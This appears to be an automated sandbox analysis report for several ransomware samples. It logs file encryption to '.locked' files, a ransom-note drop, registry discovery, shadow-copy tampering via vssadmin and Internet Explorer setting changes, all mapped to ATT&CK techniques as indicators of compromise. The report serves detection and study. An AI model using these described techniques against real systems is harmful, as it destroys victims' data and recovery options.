File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\apacxusoducohaufiqwoulqayfdycocatikayvtywokodezeusyzreorildoqynagat.locked	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\padiysyxemaqyfyhnihyubziecybneopapekuvdueqarzyxaezviahecivlesuza.locked	qiyg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_zh_CN.jar	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\ciemkyl.locked	qiyg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_zh_CN.jar	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\ruqeovawwuenwiacmo.locked	qiyg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar	qiyg.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\btn-next-static.png	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\qaboy.locked	qiyg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar	qiyg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_zh_4.4.0.v20140623020002.jar	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\ezykzygyhyluyrnomeerekzahufiotifvoloozpoequcyhkiokozyx.locked	qiyg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml	qiyg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host.jar	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\piysfuhyhawyilkihyeqpugutupyyrikurryy.locked	qiyg.exe
File created	C:\Program Files\7-Zip\[HOW_TO_DECRYPT_FILES].html	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\oslozu.locked	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\wiawsakidehomynawuolewemasihwygyukerkaruyvxy.locked	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\zazy.locked	qiyg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\fosaypguluwidepyybybvuwavobytu.locked	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\ipostivuonikorryrikuozzefebuxikaonqaimp.locked	qiyg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.event_1.3.100.v20140115-1647.jar	qiyg.exe

Drops file in Windows directory 3 IoCs

Processes:

Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exeTrojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exeExplorer.EXE

description	ioc	Process
File created	C:\WINDOWS\tasksche.exe	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
File created	C:\WINDOWS\tasksche.exe	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
File opened for modification	\??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\sc_reader.exe	Explorer.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

Trojan-Ransom.Win32.Foreign.nylp-19e0727b00b01ff02b6b60c1356cf24d688a35ee1b3c2792181849da6dd23a0c.exeTrojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exeWMIC.exeTrojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exeHEUR-Trojan-Ransom.Win32.Generic-933adce253241d48c01191e7d6749075aff5b2e8643f5ce191f7f380979a5e08.exeTrojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exeipconfig.execmd.exepowershell.exeexplorer.exeqiyg.exeHEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exeadsnobby.execmd.exeWScript.exeTrojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exeWScript.exeWScript.exeexplorer.exeTrojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exeTrojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exeTrojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exeTrojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.execmd.execmd.execipher.exeTrojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.execmd.exeTrojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.execmd.exeTrojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exeTrojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.execmd.exeTrojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exeIIXguS.exeRegAsm.execmd.execmd.execmd.execmd.exeTrojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exeTrojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exeTrojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exeTrojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exeauthupd.exeWMIC.execmd.exeHEUR-Trojan-Ransom.Win32.Generic-44bfc4e633bd60a42304856360c3b433f336be8c277fa62f54300b2adee0e319.exeTrojan-Ransom.Win32.AutoIt.vmt-c784f66acca1526d24bc7b70bcd1b19cbf002f0f391311a21aeb0b91b8ca6d96.exeTrojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exeexplorer.exeauthupd.exeipconfig.exeIEXPLORE.EXEHEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exeregasm.execipher.exeTrojan-Ransom.Win32.Foreign.nxqg-f41d6da3b7da9c73e404c7e8142d7c4ef60d950e6034bf76286d8bc33fde4f55.exeTrojan-Ransom.Win32.Blocker.meia-8179d0b5e1307621aa793c502a89ac3b7aba833f3b4fc815f99d0dbc85aa7c06.exemsiexec.exeWScript.exeWScript.exeTrojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.execmd.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Foreign.nylp-19e0727b00b01ff02b6b60c1356cf24d688a35ee1b3c2792181849da6dd23a0c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Generic-933adce253241d48c01191e7d6749075aff5b2e8643f5ce191f7f380979a5e08.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qiyg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adsnobby.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cipher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IIXguS.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	authupd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Generic-44bfc4e633bd60a42304856360c3b433f336be8c277fa62f54300b2adee0e319.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.AutoIt.vmt-c784f66acca1526d24bc7b70bcd1b19cbf002f0f391311a21aeb0b91b8ca6d96.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	authupd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regasm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cipher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Foreign.nxqg-f41d6da3b7da9c73e404c7e8142d7c4ef60d950e6034bf76286d8bc33fde4f55.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Blocker.meia-8179d0b5e1307621aa793c502a89ac3b7aba833f3b4fc815f99d0dbc85aa7c06.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exeexplorer.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	explorer.exe

Discovers systems in the same network 1 TTPs 1 IoCs

discovery

Remote System Discovery

T1018

Processes:

net.exe

pid	Process
13120	net.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

explorer.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	explorer.exe

Gathers network information 2 TTPs 4 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid	Process
2420	ipconfig.exe
3596	ipconfig.exe
5048	ipconfig.exe
6840	ipconfig.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

Processes:

systeminfo.exe

pid	Process
11888	systeminfo.exe

Interacts with shadow copies 3 TTPs 3 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

Processes:

vssadmin.exevssadmin.exevssadmin.exe

pid	Process
2160	vssadmin.exe
1960	vssadmin.exe
5092	vssadmin.exe

Modifies Control Panel 1 IoCs

evasion

Processes:

Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Control Panel\PowerCfg	Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe

Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3"	explorer.exe

Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1"	explorer.exe

Modifies Internet Explorer settings 1 TTPs 28 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXEiexplore.exeexplorer.exeIEXPLORE.EXE

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A250E271-A131-11EF-8287-5EE01BAFE073} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe

Modifies data under HKEY_USERS 24 IoCs

Processes:

Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0070000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6D5B2E2E-025E-4641-932A-3A05614DE0B5}\WpadDecisionTime = b0eca8503e35db01	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6D5B2E2E-025E-4641-932A-3A05614DE0B5}\WpadDecision = "0"	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
